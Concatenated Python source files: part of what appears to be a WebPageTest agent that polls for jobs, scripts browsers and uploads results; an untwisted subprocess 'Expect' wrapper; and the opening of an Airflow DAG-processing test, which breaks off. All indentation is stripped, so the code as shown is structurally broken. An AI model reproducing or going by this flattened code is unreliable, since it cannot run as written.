response = session.get('http://169.254.169.254/computeMetadata/v1/instance/id',
headers={'Metadata-Flavor':'Google'},
timeout=30, proxies=proxies)
if len(response.text):
self.instance_id = response.text.strip()
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
if not len(self.test_locations):
ok = False
while not ok:
try:
response = session.get('http://metadata.google.internal/computeMetadata/v1/instance/zone',
headers={'Metadata-Flavor':'Google'},
timeout=30, proxies=proxies)
if len(response.text):
zone = response.text.strip()
position = zone.rfind('/')
if position > -1:
zone = zone[position + 1:]
self.zone = zone
self.location = 'gce-' + self.zone[:-2]
if platform.system() == "Linux":
self.location += '-linux'
self.test_locations = [self.location]
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
def parse_user_data(self, user_data):
"""Parse the provided user data and extract the config info"""
logging.debug("User Data: %s", user_data)
options = user_data.split()
for option in options:
try:
parts = option.split('=', 1)
if len(parts) == 2:
key = parts[0].strip()
value = parts[1].strip()
logging.debug('Setting config option "%s" to "%s"', key, value)
if key == 'wpt_server':
if re.search(r'^https?://', value):
self.url = value
if value.endswith('/'):
self.url += 'work/'
else:
self.url += '/work/'
else:
self.url = 'http://{0}/work/'.format(value)
if key == 'wpt_url':
self.url = value
elif key == 'wpt_loc' or key == 'wpt_location':
if value is not None:
self.test_locations = value.split(',')
self.location = str(self.test_locations[0])
if key == 'wpt_location':
append = []
for loc in self.test_locations:
append.append('{0}_wptdriver'.format(loc))
if len(append):
self.test_locations.extend(append)
elif key == 'wpt_key':
self.key = value
elif key == 'wpt_timeout':
self.time_limit = int(re.search(r'\d+', str(value)).group())
elif key == 'wpt_username':
self.auth_name = value
elif key == 'wpt_password':
self.auth_password = value
elif key == 'wpt_validcertificate' and value == '1':
self.validate_server_certificate = True
elif key == 'validcertificate' and value == '1':
self.validate_server_certificate = True
elif key == 'wpt_fps':
self.fps = int(re.search(r'\d+', str(value)).group())
elif key == 'fps':
self.fps = int(re.search(r'\d+', str(value)).group())
except Exception:
pass
# pylint: disable=E1101
def get_uptime_minutes(self):
"""Get the system uptime in seconds"""
boot_time = None
try:
boot_time = psutil.boot_time()
except Exception:
pass
if boot_time is None:
try:
boot_time = psutil.get_boot_time()
except Exception:
pass
if boot_time is None:
try:
boot_time = psutil.BOOT_TIME
except Exception:
pass
uptime = None
if boot_time is not None and boot_time > 0:
uptime = int((time.time() - boot_time) / 60)
if uptime is not None and uptime < 0:
uptime = 0
return uptime
# pylint: enable=E1101
def reboot(self):
if platform.system() == 'Windows':
subprocess.call(['shutdown', '/r', '/f'])
else:
subprocess.call(['sudo', 'reboot'])
def get_test(self):
"""Get a job from the server"""
import requests
proxies = {"http": None, "https": None}
from .os_util import get_free_disk_space
if self.cpu_scale_multiplier is None:
self.benchmark_cpu()
if self.url is None:
return None
job = None
locations = list(self.test_locations) if len(self.test_locations) > 1 else [self.location]
location = str(locations.pop(0))
# Shuffle the list order
if len(self.test_locations) > 1:
self.test_locations.append(str(self.test_locations.pop(0)))
count = 0
retry = True
while count < 3 and retry:
retry = False
count += 1
url = self.url + "getwork.php?f=json&shards=1&reboot=1"
url += "&location=" + urllib.quote_plus(location)
url += "&pc=" + urllib.quote_plus(self.pc_name)
if self.key is not None:
url += "&key=" + urllib.quote_plus(self.key)
if self.instance_id is not None:
url += "&ec2=" + urllib.quote_plus(self.instance_id)
if self.zone is not None:
url += "&ec2zone=" + urllib.quote_plus(self.zone)
if self.options.android:
url += '&apk=1'
url += '&version={0}'.format(self.version)
if self.screen_width is not None:
url += '&screenwidth={0:d}'.format(self.screen_width)
if self.screen_height is not None:
url += '&screenheight={0:d}'.format(self.screen_height)
free_disk = get_free_disk_space()
url += '&freedisk={0:0.3f}'.format(free_disk)
uptime = self.get_uptime_minutes()
if uptime is not None:
url += '&upminutes={0:d}'.format(uptime)
logging.info("Checking for work: %s", url)
try:
response = self.session.get(url, timeout=30, proxies=proxies)
if self.options.alive:
with open(self.options.alive, 'a'):
os.utime(self.options.alive, None)
self.first_failure = None
if len(response.text):
if response.text == 'Reboot':
self.reboot()
return None
job = response.json()
logging.debug("Job: %s", json.dumps(job))
# set some default options
job['agent_version'] = self.version
if 'imageQuality' not in job:
job['imageQuality'] = DEFAULT_JPEG_QUALITY
if 'pngScreenShot' not in job:
job['pngScreenShot'] = 0
if 'fvonly' not in job:
job['fvonly'] = 0
if 'width' not in job:
job['width'] = 1024
if 'height' not in job:
job['height'] = 768
if 'browser_width' in job:
job['width'] = job['browser_width']
if 'browser_height' in job:
job['height'] = job['browser_height']
if 'timeout' not in job:
job['timeout'] = self.time_limit
if 'noscript' not in job:
job['noscript'] = 0
if 'Test ID' not in job or 'browser' not in job or 'runs' not in job:
job = None
if 'type' not in job:
job['type'] = ''
if job['type'] == 'traceroute':
job['fvonly'] = 1
if 'fps' not in job:
job['fps'] = self.fps
if job['type'] == 'lighthouse':
job['fvonly'] = 1
job['lighthouse'] = 1
job['keep_lighthouse_trace'] = \
bool('lighthouseTrace' in job and job['lighthouseTrace'])
job['video'] = bool('Capture Video' in job and job['Capture Video'])
job['keepvideo'] = bool('keepvideo' in job and job['keepvideo'])
job['disable_video'] = bool(not job['video'] and \
'disable_video' in job and \
job['disable_video'])
job['interface'] = None
job['persistent_dir'] = self.persistent_dir
if 'throttle_cpu' in job:
throttle = float(re.search(r'\d+\.?\d*', str(job['throttle_cpu'])).group())
throttle *= self.cpu_scale_multiplier
job['throttle_cpu_requested'] = job['throttle_cpu']
job['throttle_cpu'] = throttle
if job is None and len(locations) > 0:
location = str(locations.pop(0))
retry = True
except requests.exceptions.RequestException as err:
logging.critical("Get Work Error: %s", err.strerror)
retry = True
now = monotonic.monotonic()
if self.first_failure is None:
self.first_failure = now
# Reboot if we haven't been able to reach the server for 30 minutes
elapsed = now - self.first_failure
if elapsed > 1800:
self.reboot()
time.sleep(0.1)
except Exception:
pass
self.job = job
return job
def get_task(self, job):
"""Create a task object for the next test run or return None if the job is done"""
task = None
if self.log_handler is not None:
try:
self.log_handler.close()
logging.getLogger().removeHandler(self.log_handler)
self.log_handler = None
except Exception:
pass
if 'current_state' not in job or not job['current_state']['done']:
if 'run' in job:
# Sharded test, running one run only
if 'current_state' not in job:
job['current_state'] = {"run": int(re.search(r'\d+', str(job['run'])).group()),
"repeat_view": False,
"done": False}
elif not job['current_state']['repeat_view'] and \
('fvonly' not in job or not job['fvonly']):
job['current_state']['repeat_view'] = True
else:
return task
elif 'current_state' not in job:
job['current_state'] = {"run": 1, "repeat_view": False, "done": False}
elif not job['current_state']['repeat_view'] and \
('fvonly' not in job or not job['fvonly']):
job['current_state']['repeat_view'] = True
else:
job['current_state']['run'] += 1
job['current_state']['repeat_view'] = False
if job['current_state']['run'] <= job['runs']:
test_id = job['Test ID']
run = job['current_state']['run']
profile_dir = '{0}.{1}.{2:d}'.format(self.profile_dir, test_id, run)
task = {'id': test_id,
'run': run,
'cached': 1 if job['current_state']['repeat_view'] else 0,
'done': False,
'profile': profile_dir,
'error': None,
'log_data': True,
'activity_time': 2,
'combine_steps': False,
'video_directories': [],
'page_data': {},
'navigated': False,
'page_result': None,
'script_step_count': 1}
# Set up the task configuration options
task['port'] = 9222 + (self.test_run_count % 500)
task['task_prefix'] = "{0:d}".format(run)
if task['cached']:
task['task_prefix'] += "_Cached"
task['prefix'] = task['task_prefix']
short_id = "{0}.{1}.{2}".format(task['id'], run, task['cached'])
task['dir'] = os.path.join(self.workdir, short_id)
task['task_video_prefix'] = 'video_{0:d}'.format(run)
if task['cached']:
task['task_video_prefix'] += "_cached"
task['video_subdirectory'] = task['task_video_prefix']
if os.path.isdir(task['dir']):
shutil.rmtree(task['dir'])
os.makedirs(task['dir'])
if not os.path.isdir(profile_dir):
os.makedirs(profile_dir)
if job['current_state']['run'] == job['runs'] or 'run' in job:
if job['current_state']['repeat_view']:
job['current_state']['done'] = True
task['done'] = True
elif 'fvonly' in job and job['fvonly']:
job['current_state']['done'] = True
task['done'] = True
if 'debug' in job and job['debug']:
task['debug_log'] = os.path.join(task['dir'], task['prefix'] + '_debug.log')
try:
self.log_handler = logging.FileHandler(task['debug_log'])
self.log_handler.setFormatter(self.log_formatter)
logging.getLogger().addHandler(self.log_handler)
except Exception:
pass
if 'keepua' not in job or not job['keepua']:
task['AppendUA'] = 'PTST'
if 'UAModifier' in job:
task['AppendUA'] = job['UAModifier']
task['AppendUA'] += '/{0}'.format(self.version)
if 'AppendUA' in job:
if 'AppendUA' in task:
task['AppendUA'] += ' ' + job['AppendUA']
else:
task['AppendUA'] = job['AppendUA']
if 'AppendUA' in task:
task['AppendUA'] = task['AppendUA'].replace('%TESTID%', test_id)\
.replace('%RUN%', str(run))\
.replace('%CACHED%', str(task['cached']))\
.replace('%VERSION%', self.version)
task['block'] = []
if 'block' in job:
block_list = job['block'].split()
for block in block_list:
block = block.strip()
if len(block):
task['block'].append(block)
if 'blockDomains' in job:
if 'host_rules' not in task:
task['host_rules'] = []
if 'block_domains' not in task:
task['block_domains'] = []
domains = re.split('[, ]', job['blockDomains'])
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains'].append(domain)
task['host_rules'].append('"MAP {0} 127.0.0.1"'.format(domain))
self.build_script(job, task)
task['width'] = job['width']
task['height'] = job['height']
if 'mobile' in job and job['mobile']:
if 'browser' in job and job['browser'] in self.margins:
task['width'] = \
job['width'] + max(self.margins[job['browser']]['width'], 0)
task['height'] = \
job['height'] + max(self.margins[job['browser']]['height'], 0)
else:
task['width'] = job['width'] + 20
task['height'] = job['height'] + 120
task['time_limit'] = job['timeout']
task['test_time_limit'] = task['time_limit'] * task['script_step_count']
task['stop_at_onload'] = bool('web10' in job and job['web10'])
task['run_start_time'] = monotonic.monotonic()
# Keep the full resolution video frames if the browser window is smaller than 600px
if 'thumbsize' not in job and (task['width'] < 600 or task['height'] < 600):
job['fullSizeVideo'] = 1
self.test_run_count += 1
if task is None and os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
return task
def running_another_test(self, task):
"""Increment the port for Chrome and the run count"""
task['port'] = 9222 + (self.test_run_count % 500)
self.test_run_count += 1
def build_script(self, job, task):
"""Build the actual script that will be used for testing"""
task['script'] = []
record_count = 0
# Add script commands for any static options that need them
if 'script' in job:
lines = job['script'].splitlines()
for line in lines:
parts = line.split("\t", 2)
if parts is not None and len(parts):
keep = True
record = False
command = parts[0].lower().strip()
target = parts[1].strip() if len(parts) > 1 else None
value = parts[2].strip() if len(parts) > 2 else None
andwait = command.find('andwait')
if andwait > -1:
command = command[:andwait]
record = True
# go through the known commands
if command == 'navigate':
if target is not None and target[:4] != 'http':
target = 'http://' + target
job['url'] = target
record = True
elif command == 'addheader' or command == 'setheader':
if target is not None and len(target):
separator = target.find(':')
if separator > 0:
name = target[:separator].strip()
header_value = target[separator + 1:].strip()
if 'headers' not in task:
task['headers'] = {}
task['headers'][name] = header_value
elif command == 'overridehost':
if target and value:
if 'overrideHosts' not in task:
task['overrideHosts'] = {}
task['overrideHosts'][target] = value
elif command == 'setcookie' and target is not None and value is not None:
url = target
cookie = value
pos = cookie.find(';')
if pos > 0:
cookie = cookie[:pos]
pos = cookie.find('=')
if pos > 0:
cookie_name = cookie[:pos].strip()
cookie_value = cookie[pos+1:].strip()
if len(cookie_name) and len(cookie_value) and len(url):
if 'cookies' not in task:
task['cookies'] = []
task['cookies'].append({'url': url,
'name': cookie_name,
'value': cookie_value})
# commands that get pre-processed
elif command == 'setuseragent' and target is not None:
job['uastring'] = target
elif command == 'setbrowsersize':
keep = False
if target is not None and value is not None:
width = int(re.search(r'\d+', str(target)).group())
height = int(re.search(r'\d+', str(value)).group())
dpr = float(job['dpr']) if 'dpr' in job else 1.0
if width > 0 and height > 0 and width < 10000 and height < 10000:
job['width'] = int(float(width) / dpr)
job['height'] = int(float(height) / dpr)
elif command == 'setviewportsize':
keep = False
if target is not None and value is not None:
width = int(re.search(r'\d+', str(target)).group())
height = int(re.search(r'\d+', str(value)).group())
if width > 0 and height > 0 and width < 10000 and height < 10000:
job['width'] = width
job['height'] = height
# Adjust the viewport for non-mobile tests
if 'mobile' not in job or not job['mobile']:
if 'browser' in job and job['browser'] in self.margins:
job['width'] += \
max(self.margins[job['browser']]['width'], 0)
job['height'] += \
max(self.margins[job['browser']]['height'], 0)
else:
job['adjust_viewport'] = True
elif command == 'setdevicescalefactor' and target is not None:
keep = False
job['dpr'] = target
elif command == 'settimeout':
keep = False
if target is not None:
time_limit = int(re.search(r'\d+', str(target)).group())
if time_limit > 0 and time_limit < 1200:
job['timeout'] = time_limit
elif command == 'blockdomains':
keep = False
if target is not None:
if 'block_domains' not in task:
task['block_domains'] = []
if 'host_rules' not in task:
task['host_rules'] = []
domains = re.split('[, ]', target)
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains'].append(domain)
task['host_rules'].append('"MAP {0} 127.0.0.1"'.format(domain))
elif command == 'blockdomainsexcept':
keep = False
if target is not None:
if 'block_domains_except' not in task:
task['block_domains_except'] = []
if 'host_rules' not in task:
task['host_rules'] = []
domains = target.split()
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains_except'].append(domain)
task['host_rules'].append(
'"MAP * 127.0.0.1, EXCLUDE {0}"'.format(domain))
elif command == 'block':
keep = False
if target is not None:
block_list = target.split()
for block in block_list:
block = block.strip()
if len(block):
task['block'].append(block)
elif command == 'setdns':
keep = False
if target is not None and value is not None and len(target) and len(value):
if target.find('"') == -1 and value.find('"') == -1:
if 'host_rules' not in task:
task['host_rules'] = []
task['host_rules'].append('"MAP {0} {1}"'.format(target, value))
elif command == 'setdnsname':
# Resolve the IP and treat it like a setdns command
keep = False
if target is not None and value is not None and len(target) and len(value):
addr = None
try:
result = socket.getaddrinfo(value, 80)
if result and len(result) > 0:
for entry in result:
if entry and len(entry) >= 5:
sockaddr = entry[4]
if sockaddr and len(sockaddr) >= 1:
addr = sockaddr[0]
break
except Exception:
pass
if addr is not None and target.find('"') == -1:
if 'host_rules' not in task:
task['host_rules'] = []
task['host_rules'].append('"MAP {0} {1}"'.format(target, addr))
# Commands that get translated into exec commands
elif command in ['click', 'selectvalue', 'sendclick', 'setinnerhtml',
'setinnertext', 'setvalue', 'submitform']:
if target is not None:
# convert the selector into a querySelector
separator = target.find('=')
if separator == -1:
separator = target.find("'")
if separator >= 0:
attribute = target[:separator]
attr_value = target[separator + 1:]
script = "document.querySelector('[{0}=\"{1}\"]')".format(\
attribute, attr_value)
if command in ['click', 'sendclick']:
script += '.click();'
elif command == 'submitform' and value is not None:
script += '.submit();'
record = True
elif command in ['setvalue', 'selectvalue'] and value is not None:
script += '.value="{0}";'.format(value.replace('"', '\\"'))
elif command == 'setinnertext' and value is not None:
script += '.innerText="{0}";'.format(value.replace('"', '\\"'))
elif command == 'setinnerhtml' and value is not None:
script += '.innerHTML="{0}";'.format(value.replace('"', '\\"'))
command = 'exec'
target = script
value = None
if keep:
if record:
record_count += 1
task['script'].append({'command': command,
'target': target,
'value': value,
'record': record})
elif 'url' in job:
if job['url'][:4] != 'http':
job['url'] = 'http://' + job['url']
record_count += 1
task['script'].append({'command': 'navigate', 'target': job['url'], 'record': True})
# Remove any spurious commands from the end of the script
pos = len(task['script']) - 1
while pos > 0:
if task['script'][pos]['record']:
break
task['script'].pop(pos)
pos -= 1
task['script_step_count'] = max(record_count, 1)
logging.debug(task['script'])
def update_browser_viewport(self, task):
"""Update the browser border size based on the measured viewport"""
if 'actual_viewport' in task and 'width' in task and 'height' in task and \
self.job is not None and 'browser' in self.job:
browser = self.job['browser']
width = max(task['width'] - task['actual_viewport']['width'], 0)
height = max(task['height'] - task['actual_viewport']['height'], 0)
if browser not in self.margins or self.margins[browser]['width'] != width or \
self.margins[browser]['height'] != height:
self.margins[browser] = {"width": width, "height": height}
if not os.path.isdir(self.persistent_dir):
os.makedirs(self.persistent_dir)
margins_file = os.path.join(self.persistent_dir, 'margins.json')
with open(margins_file, 'wb') as f_out:
json.dump(self.margins, f_out)
def body_fetch_thread(self):
"""background thread to fetch bodies"""
import requests
session = requests.session()
proxies = {"http": None, "https": None}
try:
while True:
task = self.fetch_queue.get_nowait()
try:
url = task['url']
dest = task['file']
headers = {}
if isinstance(task['headers'], list):
for header in task['headers']:
separator = header.find(':', 2)
if separator >= 0:
header_name = header[:separator].strip()
value = header[separator + 1:].strip()
if header_name.lower() not in ["accept-encoding"] and \
not header_name.startswith(':'):
headers[header_name] = value
elif isinstance(task['headers'], dict):
for header_name in task['headers']:
value = task['headers'][header_name]
if header_name.lower() not in ["accept-encoding"] and \
not header_name.startswith(':'):
headers[header_name] = value
logging.debug('Downloading %s to %s', url, dest)
response = session.get(url, headers=headers, stream=True,
timeout=30, proxies=proxies)
if response.status_code == 200:
with open(dest, 'wb') as f_out:
for chunk in response.iter_content(chunk_size=4096):
f_out.write(chunk)
self.fetch_result_queue.put(task)
except Exception:
pass
self.fetch_queue.task_done()
except Exception:
pass
def get_bodies(self, task):
"""Fetch any bodies that are missing if response bodies were requested"""
all_bodies = False
html_body = False
if 'bodies' in self.job and self.job['bodies']:
all_bodies = True
if 'htmlbody' in self.job and self.job['htmlbody']:
html_body = True
if not all_bodies and not html_body:
return
try:
path_base = os.path.join(task['dir'], task['prefix'])
path = os.path.join(task['dir'], 'bodies')
requests = []
devtools_file = os.path.join(task['dir'], task['prefix'] + '_devtools_requests.json.gz')
with gzip.open(devtools_file, 'rb') as f_in:
requests = json.load(f_in)
count = 0
bodies_zip = path_base + '_bodies.zip'
if requests and 'requests' in requests:
# See what bodies are already in the zip file
body_index = 0
bodies = []
try:
with zipfile.ZipFile(bodies_zip, 'r') as zip_file:
files = zip_file.namelist()
for filename in files:
matches = re.match(r'^(\d\d\d)-(.*)-body.txt$', filename)
if matches:
index = int(matches.group(1))
request_id = str(matches.group(2))
if index > body_index:
body_index = index
bodies.append(request_id)
except Exception:
pass
for request in requests['requests']:
if 'full_url' in request and \
'responseCode' in request \
and request['responseCode'] == 200 and \
request['full_url'].find('ocsp') == -1 and\
request['full_url'].find('.woff') == -1 and\
request['full_url'].find('.ttf') == -1 and\
'contentType' in request:
content_type = request['contentType'].lower()
need_body = False
if all_bodies:
if content_type.startswith('text/html') or \
content_type.find('javascript') >= 0 or \
content_type.find('json') >= 0:
need_body = True
elif html_body and content_type.startswith('text/html'):
need_body = True
html_body = False
if need_body:
body_id = str(request['id'])
if 'raw_id' in request:
body_id = str(request['raw_id'])
if body_id not in bodies:
count += 1
body_file_path = os.path.join(path, str(body_id))
headers = None
if 'headers' in request and 'request' in request['headers']:
headers = request['headers']['request']
task = {'url': request['full_url'],
'file': body_file_path,
'id': body_id,
'headers': headers}
if os.path.isfile(body_file_path):
self.fetch_result_queue.put(task)
else:
self.fetch_queue.put(task)
if count:
if not os.path.isdir(path):
os.makedirs(path)
logging.debug("Fetching bodies for %d requests", count)
threads = []
thread_count = min(count, 10)
for _ in xrange(thread_count):
thread = threading.Thread(target=self.body_fetch_thread)
thread.daemon = True
thread.start()
threads.append(thread)
for thread in threads:
thread.join(timeout=120)
# Build a list of files to add to the zip archive
bodies = []
try:
while True:
task = self.fetch_result_queue.get_nowait()
if os.path.isfile(task['file']):
# check to see if it is text or utf-8 data
try:
data = ''
with open(task['file'], 'rb') as f_in:
data = f_in.read()
json.loads('"' + data.replace('"', '\\"') + '"')
body_index += 1
file_name = '{0:03d}-{1}-body.txt'.format(body_index, task['id'])
bodies.append({'name': file_name, 'file': task['file']})
except Exception:
pass
self.fetch_result_queue.task_done()
except Exception:
pass
# Add the files
if bodies:
with zipfile.ZipFile(bodies_zip, 'a', zipfile.ZIP_DEFLATED) as zip_file:
for body in bodies:
zip_file.write(body['file'], body['name'])
except Exception:
pass
def upload_task_result(self, task):
"""Upload the result of an individual test run"""
logging.info('Uploading result')
cpu_pct = None
self.update_browser_viewport(task)
self.get_bodies(task)
# Stop logging to the file
if self.log_handler is not None:
try:
self.log_handler.close()
logging.getLogger().removeHandler(self.log_handler)
self.log_handler = None
except Exception:
pass
if 'debug_log' in task and os.path.isfile(task['debug_log']):
debug_out = task['debug_log'] + '.gz'
with open(task['debug_log'], 'rb') as f_in:
with gzip.open(debug_out, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
try:
os.remove(task['debug_log'])
except Exception:
pass
if 'page_data' in task and 'fullyLoadedCPUpct' in task['page_data']:
cpu_pct = task['page_data']['fullyLoadedCPUpct']
data = {'id': task['id'],
'location': self.location,
'run': str(task['run']),
'cached': str(task['cached']),
'pc': self.pc_name}
if self.key is not None:
data['key'] = self.key
if self.instance_id is not None:
data['ec2'] = self.instance_id
if self.zone is not None:
data['ec2zone'] = self.zone
needs_zip = []
zip_path = None
if os.path.isdir(task['dir']):
# upload any video images
if bool(self.job['video']) and len(task['video_directories']):
for video_subdirectory in task['video_directories']:
video_dir = os.path.join(task['dir'], video_subdirectory)
if os.path.isdir(video_dir):
for filename in os.listdir(video_dir):
filepath = os.path.join(video_dir, filename)
if os.path.isfile(filepath):
name = video_subdirectory + '/' + filename
if os.path.getsize(filepath) > 100000:
logging.debug('Uploading %s (%d bytes)', filename,
os.path.getsize(filepath))
if self.post_data(self.url + "resultimage.php", data,
filepath, task['prefix'] + '_' + filename):
os.remove(filepath)
else:
needs_zip.append({'path': filepath, 'name': name})
else:
needs_zip.append({'path': filepath, 'name': name})
# Upload the separate large files (> 100KB)
for filename in os.listdir(task['dir']):
filepath = os.path.join(task['dir'], filename)
if os.path.isfile(filepath):
# Delete any video files that may have squeaked by
if not self.job['keepvideo'] and filename[-4:] == '.mp4' and \
filename.find('rendered_video') == -1:
try:
os.remove(filepath)
except Exception:
pass
elif os.path.getsize(filepath) > 100000:
logging.debug('Uploading %s (%d bytes)', filename,
os.path.getsize(filepath))
if self.post_data(self.url + "resultimage.php", data, filepath, filename):
try:
os.remove(filepath)
except Exception:
pass
else:
needs_zip.append({'path': filepath, 'name': filename})
else:
needs_zip.append({'path': filepath, 'name': filename})
# Zip the remaining files
if len(needs_zip):
zip_path = os.path.join(task['dir'], "result.zip")
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_STORED) as zip_file:
for zipitem in needs_zip:
logging.debug('Storing %s (%d bytes)', zipitem['name'],
os.path.getsize(zipitem['path']))
zip_file.write(zipitem['path'], zipitem['name'])
try:
os.remove(zipitem['path'])
except Exception:
pass
# Post the workdone event for the task (with the zip attached)
if task['done']:
data['done'] = '1'
if task['error'] is not None:
data['error'] = task['error']
if cpu_pct is not None:
data['cpu'] = '{0:0.2f}'.format(cpu_pct)
logging.debug('Uploading result zip')
self.post_data(self.url + "workdone.php", data, zip_path, 'result.zip')
# Clean up so we don't leave directories lying around
if os.path.isdir(task['dir']):
try:
shutil.rmtree(task['dir'])
except Exception:
pass
if task['done'] and os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
def post_data(self, url, data, file_path, filename):
"""Send a multi-part post"""
ret = True
# pass the data fields as query params and any files as post data
url += "?"
for key in data:
if data[key] != None:
url += key + '=' + urllib.quote_plus(data[key]) + '&'
logging.debug(url)
try:
if file_path is not None and os.path.isfile(file_path):
self.session.post(url,
files={'file':(filename, open(file_path, 'rb'))},
timeout=300,)
else:
self.session.post(url)
except Exception:
logging.exception("Upload Exception")
ret = False
return ret
|
expect.py
|
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
from queue import Queue
from untwisted.dispatcher import Dispatcher
from untwisted import core
from untwisted.event import LOAD, CLOSE
from untwisted.waker import waker
class ChildError(Exception):
pass
class ChildThread(Dispatcher):
SIZE = -1
def __init__(self, child):
self.child = child
self.thread = Thread(target=self.run)
self.queue = Queue()
self.terminate = self.child.terminate
core.gear.pool.append(self)
Dispatcher.__init__(self)
Thread.__init__(self)
self.thread.start()
def run(self):
"""
"""
while True:
data = self.read()
waker.wake_up()
if not data:
break
self.child.wait()
def update(self):
"""
"""
while not self.queue.empty():
self.dispatch()
def dispatch(self):
data = self.queue.get_nowait()
if not data:
self.drive(CLOSE)
else:
self.drive(LOAD, data)
def destroy(self):
"""
Unregister up from untwisted reactor. It is needed
to call self.terminate() first to kill the process.
"""
core.gear.pool.remove(self)
self.base.clear()
class ChildStdout(ChildThread):
"""
An event emitter to read data from a process stdout stream.
"""
def __init__(self, child):
if child.stdout is None:
raise ChildError('Child has no stdout!')
self.stdout = child.stdout
super(ChildStdout, self).__init__(child)
def read(self):
data = self.stdout.readline(self.SIZE)
self.queue.put_nowait(data)
return data
class ChildStderr(ChildThread):
"""
An event emitter to read data from a process stderr stream.
"""
def __init__(self, child):
if child.stderr is None:
raise ChildError('Child has no stderr!')
self.stderr = child.stderr
super(ChildStderr, self).__init__(child)
def read(self):
data = self.stderr.readline(self.SIZE)
self.queue.put_nowait(data)
return data
class ChildStdin:
"""
A wrapper around a process stdin stream to dump data to an
underlying process.
"""
def __init__(self, child):
self.child = child
if child.stdin is None:
raise ChildError('Child has no stdin!')
def send(self, data):
"""
Send data to the child process through.
"""
self.child.stdin.write(data)
self.child.stdin.flush()
class Expect(ChildStdout, ChildStdin):
"""
This class is used to spawn processes.
python = Expect('python2.7', '-i')
python.send('print "hello world"')
python.terminate()
python.destroy()
"""
def __init__(self, *args):
"""
"""
child = Popen(args, stdout=PIPE,
stdin=PIPE, stderr=STDOUT)
self.args = args
self.stdin = child.stdin
self.stdout = child.stdout
super(Expect, self).__init__(child)
|
test_dag_processing.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import multiprocessing
import os
import pathlib
import random
import socket
import sys
import threading
import unittest
from datetime import datetime, timedelta
from tempfile import TemporaryDirectory
from unittest import mock
from unittest.mock import MagicMock, PropertyMock
import pytest
from airflow.configuration import conf
from airflow.jobs.local_task_job import LocalTaskJob as LJ
from airflow.jobs.scheduler_job import DagFileProcessorProcess
from airflow.models import DagBag, DagModel, TaskInstance as TI
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.utils import timezone
from airflow.utils.callback_requests import CallbackRequest, TaskCallbackRequest
from airflow.utils.dag_processing import (
DagFileProcessorAgent,
DagFileProcessorManager,
DagFileStat,
DagParsingSignal,
DagParsingStat,
)
from airflow.utils.net import get_hostname
from airflow.utils.session import create_session
from airflow.utils.state import State
from tests.core.test_logging_config import SETTINGS_FILE_VALID, settings_context
from tests.test_utils.config import conf_vars
from tests.test_utils.db import clear_db_dags, clear_db_runs, clear_db_serialized_dags
TEST_DAG_FOLDER = pathlib.Path(__file__).parent.parent / 'dags'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
class FakeDagFileProcessorRunner(DagFileProcessorProcess):
# This fake processor will return the zombies it received in constructor
# as its processing result w/o actually parsing anything.
def __init__(self, file_path, pickle_dags, dag_ids, callbacks):
super().__init__(file_path, pickle_dags, dag_ids, callbacks)
# We need a "real" selectable handle for waitable_handle to work
readable, writable = multiprocessing.Pipe(duplex=False)
writable.send('abc')
writable.close()
self._waitable_handle = readable
self._result = 0, 0
def start(self):
pass
@property
def start_time(self):
return DEFAULT_DATE
@property
def pid(self):
return 1234
@property
def done(self):
return True
@property
def result(self):
return self._result
@staticmethod
def _fake_dag_processor_factory(file_path, callbacks, dag_ids, pickle_dags):
return FakeDagFileProcessorRunner(
file_path,
pickle_dags,
dag_ids,
callbacks,
)
@property
def waitable_handle(self):
return self._waitable_handle
class TestDagFileProcessorManager(unittest.TestCase):
def setUp(self):
clear_db_runs()
def run_processor_manager_one_loop(self, manager, parent_pipe):
if not manager._async_mode:
parent_pipe.send(DagParsingSignal.AGENT_RUN_ONCE)
results = []
while True:
manager._run_parsing_loop()
while parent_pipe.poll(timeout=0.01):
obj = parent_pipe.recv()
if not isinstance(obj, DagParsingStat):
results.append(obj)
elif obj.done:
return results
raise RuntimeError("Shouldn't get here - nothing to read, but manager not finished!")
@conf_vars({('core', 'load_examples'): 'False'})
def test_max_runs_when_no_files(self):
child_pipe, parent_pipe = multiprocessing.Pipe()
with TemporaryDirectory(prefix="empty-airflow-dags-") as dags_folder:
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
manager = DagFileProcessorManager(
dag_directory=dags_folder,
max_runs=1,
processor_factory=FakeDagFileProcessorRunner._fake_dag_processor_factory,
processor_timeout=timedelta.max,
signal_conn=child_pipe,
dag_ids=[],
pickle_dags=False,
async_mode=async_mode,
)
self.run_processor_manager_one_loop(manager, parent_pipe)
child_pipe.close()
parent_pipe.close()
@pytest.mark.backend("mysql", "postgres")
def test_start_new_processes_with_same_filepath(self):
"""
Test that when a processor already exist with a filepath, a new processor won't be created
with that filepath. The filepath will just be removed from the list.
"""
processor_factory_mock = MagicMock()
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=processor_factory_mock,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
file_1 = 'file_1.py'
file_2 = 'file_2.py'
file_3 = 'file_3.py'
manager._file_path_queue = [file_1, file_2, file_3]
# Mock that only one processor exists. This processor runs with 'file_1'
manager._processors[file_1] = MagicMock()
# Start New Processes
manager.start_new_processes()
# Because of the config: '[scheduler] parsing_processes = 2'
